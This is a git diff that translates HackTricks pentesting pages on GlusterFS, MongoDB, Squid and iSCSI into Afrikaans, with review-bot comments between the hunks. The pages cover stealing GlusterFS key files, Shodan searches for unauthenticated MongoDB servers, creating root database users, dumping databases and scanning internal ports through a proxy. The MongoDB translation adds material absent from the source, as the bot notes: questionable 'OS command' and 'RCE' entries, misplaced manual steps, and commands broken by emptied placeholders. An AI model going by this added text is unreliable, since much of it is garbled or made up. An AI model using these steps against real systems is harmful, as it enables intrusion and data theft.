- -To list and mount the available volumes you can use: +Om met hierdie lêersisteem te kommunikeer, moet jy die [**GlusterFS-kliënt**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) installeer (`sudo apt-get install glusterfs-cli`). +Om die beskikbare volumes te lys en te monteer, kan jy die volgende gebruik: ```bash sudo gluster --remote-host=10.10.11.131 volume list # This will return the name of the volumes sudo mount -t glusterfs 10.10.11.131:/ /mnt/ ``` +As jy 'n **fout kry wanneer jy die lêersisteem probeer monteer**, kan jy die logboeke in `/var/log/glusterfs/` nagaan. -If you receive an **error trying to mount the filesystem**, you can check the logs in `/var/log/glusterfs/` - -**Errors mentioning certificates** can be fixed by stealing the files (if you have access to the system): +**Foute wat sertifikate noem**, kan reggemaak word deur die lêers te steel (as jy toegang tot die stelsel het): * /etc/ssl/glusterfs.ca * /etc/ssl/glusterfs.key * /etc/ssl/glusterfs.ca.pem -And storing them in your machine `/etc/ssl` or `/usr/lib/ssl` directory (if a different directory is used check for lines similar to: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" in the logs) . +En hulle te stoor in jou masjien se `/etc/ssl` of `/usr/lib/ssl` gids (as 'n ander gids gebruik word, kyk vir lyne soos: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" in die logboeke).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
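Review bot: two terms in hunk `@@ -1,69 +1,61 @@` drift from the rest of the translation: `## Opname` for `## Enumeration` (the docker page in this same commit uses `## Enumerasie`, which is the established term), and `bakstene` for "bricks" in `Vir die poort 49152 moet poorte wat met 1 verhoog word, oop wees om meer bakstene te gebruik`. "Brick" is GlusterFS's own name for a storage unit and should stay as `bricks`. The hunk also removes the blank lines around the fences (for example `+Om die beskikbare volumes te lys en te monteer, kan jy die volgende gebruik:` now sits directly on the opening fence); keep the source's spacing.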
- - diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md index 9e2325bd6..e6edb0191 100644 --- a/network-services-pentesting/27017-27018-mongodb.md +++ b/network-services-pentesting/27017-27018-mongodb.md @@ -2,47 +2,74 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Gaan in gesprek met inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbountes wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information - -**MongoDB** is an **open source** database management system that uses a **document-oriented database model** to handle diverse forms of data. It offers flexibility and scalability for managing unstructured or semi-structured data in applications like big data analytics and content management. -**Default port:** 27017, 27018 +## Basiese Inligting +**MongoDB** is 'n **oopbron** databasisbestuurstelsel wat 'n **dokumentgeoriënteerde databasismodel** gebruik om diverse vorms van data te hanteer. Dit bied buigsaamheid en skaalbaarheid vir die bestuur van ongestruktureerde of semi-gestruktureerde data in toepassings soos groot data-analise en inhoudsbestuur. 
+**Verstekpoort:** 27017, 27018 ``` PORT STATE SERVICE VERSION 27017/tcp open mongodb MongoDB 2.6.9 2.6.9 ``` +## Opstel -## Enumeration +### Handleiding -### Manual +Om MongoDB-databasisse te enumerasieer, kan jy die volgende stappe volg: +1. Identifiseer die IP-adres en poort van die MongoDB-diens. +2. Maak 'n verbinding met die MongoDB-diens deur die `mongo`-klient te gebruik. +3. Voer die volgende opdrag in om die lys van databasisse te sien: + + ```bash + show dbs + ``` + +4. Voer die volgende opdrag in om die huidige databasis te kies: + + ```bash + use + ``` + +5. Voer die volgende opdrag in om die lys van kolleksies in die databasis te sien: + + ```bash + show collections + ``` + +6. Voer die volgende opdrag in om die dokumente in 'n spesifieke kolleksie te sien: + + ```bash + db..find() + ``` + +Deur hierdie stappe te volg, kan jy die MongoDB-databasisse en hul inhoud ondersoek. ```python from pymongo import MongoClient client = MongoClient(host, port, username=username, password=password) 
@@ -52,13 +79,115 @@ admin = client.admin admin_info = admin.command("serverStatus") cursor = client.list_databases() for db in cursor: - print(db) - print(client[db["name"]].list_collection_names()) +print(db) +print(client[db["name"]].list_collection_names()) #If admin access, you could dump the database also ``` +**Sommige MongoDB-opdragte:** -**Some MongoDB commnads:** +```bash +# Show databases +# Wys databasisse +show databases +# Use a specific database +# Gebruik 'n spesifieke databasis +use + +# Show collections in the current database +# Wys versamelings in die huidige databasis +show collections + +# Show documents in a collection +# Wys dokumente in 'n versameling +db..find() + +# Insert a document into a collection +# Voeg 'n dokument by 'n versameling in +db..insertOne({}) + +# Update a document in a collection +# Werk 'n dokument in 'n versameling op +db..updateOne({}, {$set: {}}) + +# Delete a document from a collection +# Verwyder 'n dokument uit 'n versameling +db..deleteOne({}) +``` + +**Enumeration:** + +```bash +# Enumerate databases +# Enumereer databasisse +show databases + +# Enumerate collections in a database +# Enumereer versamelings in 'n databasis +show collections + +# Enumerate documents in a collection +# Enumereer dokumente in 'n versameling +db..find() +``` + +**Exploitation:** + +```bash +# Dump all databases +# Stort alle databasisse +mongodump --out + +# Restore a database +# Herstel 'n databasis +mongorestore + +# Execute OS commands +# Voer OS-opdragte uit +db.runCommand({$eval: ""}) + +# Remote Code Execution (RCE) +# Verrekenaarkode-uitvoering (RCE) +db.runCommand({$where: ""}) +``` + +**Privilege Escalation:** + +```bash +# Create a new user with root role +# Skep 'n nuwe gebruiker met 'n root-rol +use admin +db.createUser({user: "", pwd: "", roles: ["root"]}) + +# Authenticate as a user +# Verifieer as 'n gebruiker +use admin +db.auth("", "") +``` + +**Exfiltration:** + +```bash +# Export a collection to a JSON file +# 
Voer 'n versameling uit na 'n JSON-lêer +mongoexport --db --collection --out .json + +# Import a JSON file into a collection +# Voer 'n JSON-lêer in 'n versameling in +mongoimport --db --collection --file .json +``` + +**Other:** + +```bash +# Show server status +# Wys bedienerstatus +db.serverStatus() + +# Show current user +# Wys huidige gebruiker +db.runCommand({connectionStatus: 1}) +``` ```bash show dbs use 
@@ -67,96 +196,153 @@ db..find() #Dump the collection db..count() #Number of records of the collection db.current.find({"username":"admin"}) #Find in current db the username admin ``` +### Outomatiese -### Automatic +```bash +nmap -p 27017,27018 --script mongodb-info +``` +Hierdie opdrag gebruik die `nmap`-hulpmiddel om die poorte 27017 en 27018 op die teiken te skandeer en die `mongodb-info` skripsie uit te voer. Hierdie skripsie sal probeer om inligting oor die MongoDB-diens te verkry, soos die weergawe, die databasisse wat beskikbaar is en die dokumente binne-in die databasisse. + +```bash +mongo --host --port 27017 +``` + +Hierdie opdrag maak 'n verbinding met die MongoDB-diens op die teiken deur die `mongo`-kliënt te gebruik. Dit vereis die spesifisering van die teiken se IP-adres (``) en die poort (`27017`). Hierdie opdrag sal jou in staat stel om direk met die MongoDB-diens te kommunikeer en verskillende opdragte uit te voer. + +```bash +show dbs +``` + +Hierdie opdrag sal 'n lys van alle databasisse wat beskikbaar is op die MongoDB-diens toon. + +```bash +use +``` + +Hierdie opdrag sal oorskakel na die gespesifiseerde databasis (``) sodat jy opdragte binne-in daardie databasis kan uitvoer. + +```bash +show collections +``` + +Hierdie opdrag sal 'n lys van alle versamelings binne-in die huidige databasis toon. + +```bash +db..find() +``` + +Hierdie opdrag sal alle dokumente binne-in die gespesifiseerde versameling (``) in die huidige databasis toon. + +```bash +db..find() +``` + +Hierdie opdrag sal alle dokumente binne-in die gespesifiseerde versameling (``) in die huidige databasis toon wat voldoen aan die gespesifiseerde vraag (``). Die vraag kan verskillende kriteria insluit, soos veldwaardes, vergelykingsoperatore en logiese operatore. + +```bash +db..insert() +``` + +Hierdie opdrag sal 'n nuwe dokument invoeg in die gespesifiseerde versameling (``) in die huidige databasis. 
Die dokument moet in JSON-formaat wees en die veldwaardes moet ooreenstem met die versameling se skema. + +```bash +db..update(, ) +``` + +Hierdie opdrag sal een of meer dokumente binne-in die gespesifiseerde versameling (``) in die huidige databasis opdateer wat voldoen aan die gespesifiseerde vraag (``). Die opdatering moet in JSON-formaat wees en kan verskillende opdateringsoperasies insluit, soos `$set`, `$unset`, `$inc`, `$push`, ensovoorts. + +```bash +db..remove() +``` + +Hierdie opdrag sal een of meer dokumente binne-in die gespesifiseerde versameling (``) in die huidige databasis verwyder wat voldoen aan die gespesifiseerde vraag (``). + +```bash +exit +``` + +Hierdie opdrag sal die huidige `mongo`-sessie afsluit en jou terugbring na die opdraglyn. ```bash nmap -sV --script "mongo* and default" -p 27017 #By default all the nmap mongo enumerate scripts are used ``` - ### Shodan -* All mongodb: `"mongodb server information"` -* Search for full open mongodb servers: `"mongodb server information" -"partially enabled"` -* Only partially enable auth: `"mongodb server information" "partially enabled"` +* Alle mongodb: `"mongodb bediener inligting"` +* Soek na volledig oop mongodb bedieners: `"mongodb bediener inligting" -"gedeeltelik geaktiveer"` +* Slegs gedeeltelik geaktiveerde outentifikasie: `"mongodb bediener inligting" "gedeeltelik geaktiveer"` -## Login - -By default mongo does not require password.\ -**Admin** is a common mongo database. +## Aanteken +Standaard vereis mongo nie 'n wagwoord nie.\ +**Admin** is 'n algemene mongo databasis. ```bash mongo mongo : mongo :/ mongo -u -p '' ``` - -The nmap script: _**mongodb-brute**_ will check if creds are needed. - +Die nmap-skrip: _**mongodb-brute**_ sal nagaan of geloofwaardigheidsbewyse benodig word. 
```bash nmap -n -sV --script mongodb-brute -p 27017 ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#mongo) -Look inside _/opt/bitnami/mongodb/mongodb.conf_ to know if credentials are needed: - +Kyk binne in _/opt/bitnami/mongodb/mongodb.conf_ om uit te vind of geloofsbriewe benodig word: ```bash grep "noauth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#" #Not needed grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not needed ``` +## Mongo Objectid Voorspelling -## Mongo Objectid Predict +Voorbeeld [van hier](https://techkranti.com/idor-through-mongodb-object-ids-prediction/). -Example [from here](https://techkranti.com/idor-through-mongodb-object-ids-prediction/). - -Mongo Object IDs are **12-byte hexadecimal** strings: +Mongo Object IDs is **12-byte heksadesimale** strings: ![http://techidiocy.com/_id-objectid-in-mongodb/](../.gitbook/assets/id-and-objectids-in-mongodb.png) -For example, here’s how we can dissect an actual Object ID returned by an application: 5f2459ac9fa6dc2500314019 +Byvoorbeeld, hier is hoe ons 'n werklike Object ID kan ontleed wat deur 'n toepassing teruggegee word: 5f2459ac9fa6dc2500314019 -1. 5f2459ac: 1596217772 in decimal = Friday, 31 July 2020 17:49:32 -2. 9fa6dc: Machine Identifier -3. 2500: Process ID -4. 314019: An incremental counter +1. 5f2459ac: 1596217772 in desimaal = Vrydag, 31 Julie 2020 17:49:32 +2. 9fa6dc: Masjien-identifiseerder +3. 2500: Proses-ID +4. 314019: 'n Inkrementele teller -Of the above elements, machine identifier will remain the same for as long as the database is running the same physical/virtual machine. Process ID will only change if the MongoDB process is restarted. Timestamp will be updated every second. The only challenge in guessing Object IDs by simply incrementing the counter and timestamp values, is the fact that Mongo DB generates Object IDs and assigns Object IDs at a system level. 
+Van die bogenoemde elemente sal die masjien-identifiseerder dieselfde bly solank as wat die databasis dieselfde fisiese/virtuele masjien gebruik. Die proses-ID sal slegs verander as die MongoDB-proses herlaai word. Die tydstempel sal elke sekonde opdateer word. Die enigste uitdaging in die raai van Object IDs deur eenvoudig die teller- en tydstempelwaardes te verhoog, is die feit dat Mongo DB Object IDs genereer en toewys op 'n stelselvlak. -The tool [https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict), given a starting Object ID (you can create an account and get a starting ID), it sends back about 1000 probable Object IDs that could have possibly been assigned to the next objects, so you just need to bruteforce them. +Die instrument [https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict), gee 'n begin Object ID (jy kan 'n rekening skep en 'n begin-ID kry), dit stuur terug omtrent 1000 waarskynlike Object IDs wat moontlik toegewys kon gewees het aan die volgende voorwerpe, sodat jy hulle net hoef te kragtewerk. -## Post +## Plaas -If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**. +As jy root is, kan jy die **mongodb.conf**-lêer **verander** sodat geen geloofsbriewe nodig is (_noauth = true_) en **sonder geloofsbriewe aanmeld**. ***
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutjagters te kommunikeer! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Gaan in gesprek met inhoud wat die opwinding en uitdagings van hackering ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige hackeringwêreld deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutjagings wat begin en noodsaaklike platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hackering van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hackeringtruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
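Review bot: The Shodan search strings must stay in English: `"mongodb bediener inligting"` and `"gedeeltelik geaktiveer"` are literal query terms matched against server banners, so translating them (`"mongodb server information"`, `"partially enabled"`) yields searches that return nothing; only the surrounding prose should be translated. The heading `## Post` is rendered as `## Plaas`, which reads as "post a message" rather than post-exploitation; `## Na-eksploitasie` or leaving "Post" would be clearer. The `### Outomatiese` ("Automatic") section also gains about fifteen separate code blocks (`show dbs`, `use`, `db..insert()`, `exit`, ...) each followed by an explanatory paragraph that does not exist in the English original; these are manual mongo-shell steps and contradict the heading, and the added `nmap -p 27017,27018 --script mongodb-info` line has no target argument. The one original line in that section, `nmap -sV --script "mongo* and default" -p 27017`, is all the source had.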
diff --git a/network-services-pentesting/3128-pentesting-squid.md b/network-services-pentesting/3128-pentesting-squid.md index 898ada341..649202ae2 100644 --- a/network-services-pentesting/3128-pentesting-squid.md +++ b/network-services-pentesting/3128-pentesting-squid.md @@ -1,71 +1,61 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -From [Wikipedia](https://en.wikipedia.org/wiki/Squid\_\(software\)): +Vanaf [Wikipedia](https://en.wikipedia.org/wiki/Squid\_\(software\)): -> **Squid** is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic. Although primarily used for HTTP and FTP, Squid includes limited support for several other protocols including Internet Gopher, SSL, TLS and HTTPS. Squid does not support the SOCKS protocol, unlike Privoxy, with which Squid can be used in order to provide SOCKS support. - -**Default port:** 3128 +> **Squid** is 'n kassering- en deurstuur-HTTP-webproksi. Dit het 'n wye verskeidenheid toepassings, insluitend die versnelling van 'n webbediener deur herhaalde versoekings te kassering, kassering van web-, DNS- en ander rekenaarnetwerksoektogte vir 'n groep mense wat netwerkbronne deel, en bydra tot sekuriteit deur verkeer te filtreer. Alhoewel dit hoofsaaklik gebruik word vir HTTP en FTP, sluit Squid beperkte ondersteuning in vir verskeie ander protokolle, insluitend Internet Gopher, SSL, TLS en HTTPS. Squid ondersteun nie die SOCKS-protokol nie, in teenstelling met Privoxy, waarmee Squid gebruik kan word om SOCKS-ondersteuning te bied. +**Verstekpoort:** 3128 ``` PORT STATE SERVICE VERSION 3128/tcp open http-proxy Squid http proxy 4.11 ``` +# Opstel -# Enumeration - -## Web Proxy - -You can try to set this discovered service as proxy in your browser. However, if it's configured with HTTP authentication you will be prompted for usernames and password. +## Webproksi +Jy kan probeer om hierdie ontdekte diens as 'n proksi in jou webblaaier in te stel. Indien dit egter gekonfigureer is met HTTP-verifikasie, sal jy gevra word vir gebruikersname en wagwoord. 
```bash # Try to proxify curl curl --proxy http://10.10.11.131:3128 http://10.10.11.131 ``` +## Nmap geproksimeer -## Nmap proxified +Jy kan ook probeer om die proxy te misbruik om **interne poorte te skandeer deur nmap te geproksimeer**.\ +Stel proxychains in om die squid proxy te gebruik deur die volgende lyn aan die einde van die proxichains.conf-lêer toe te voeg: `http 10.10.10.10 3128` -You can also try to abuse the proxy to **scan internal ports proxifying nmap**.\ -Configure proxychains to use the squid proxy adding he following line at the end of the proxichains.conf file: `http 10.10.10.10 3128` +Voer dan nmap uit met proxychains om **die gasheer vanaf die plaaslike masjien te skandeer**: `proxychains nmap -sT -n -p- localhost` -Then run nmap with proxychains to **scan the host from local**: `proxychains nmap -sT -n -p- localhost` - -## SPOSE Scanner - -Alternatively, the Squid Pivoting Open Port Scanner ([spose.py](https://github.com/aancw/spose)) can be used. +## SPOSE-skandeerder +Alternatiewelik kan die Squid Pivoting Open Port Scanner ([spose.py](https://github.com/aancw/spose)) gebruik word. ```bash python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131 ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
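Review bot: `-# Enumeration` / `+# Opstel` mistranslates the heading: "Opstel" means setup or configuration, while the section is about enumerating the proxy; `# Enumerasie` (or the untranslated "Enumeration", as the surrounding HackTricks pages use) would be correct. The translated text also keeps the source typo `proxichains.conf` (the file is `proxychains.conf`), which a translation pass is a good moment to fix in both languages. Style: the hunk deletes the blank lines that separated headings and prose from the fenced blocks (for example `+**Verstekpoort:** 3128` is immediately followed by the opening fence); the English source keeps those blank lines, and the Afrikaans version should match for consistent rendering.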
- - diff --git a/network-services-pentesting/3260-pentesting-iscsi.md b/network-services-pentesting/3260-pentesting-iscsi.md index b060b08fb..2f71b1b0b 100644 --- a/network-services-pentesting/3260-pentesting-iscsi.md +++ b/network-services-pentesting/3260-pentesting-iscsi.md @@ -2,107 +2,124 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
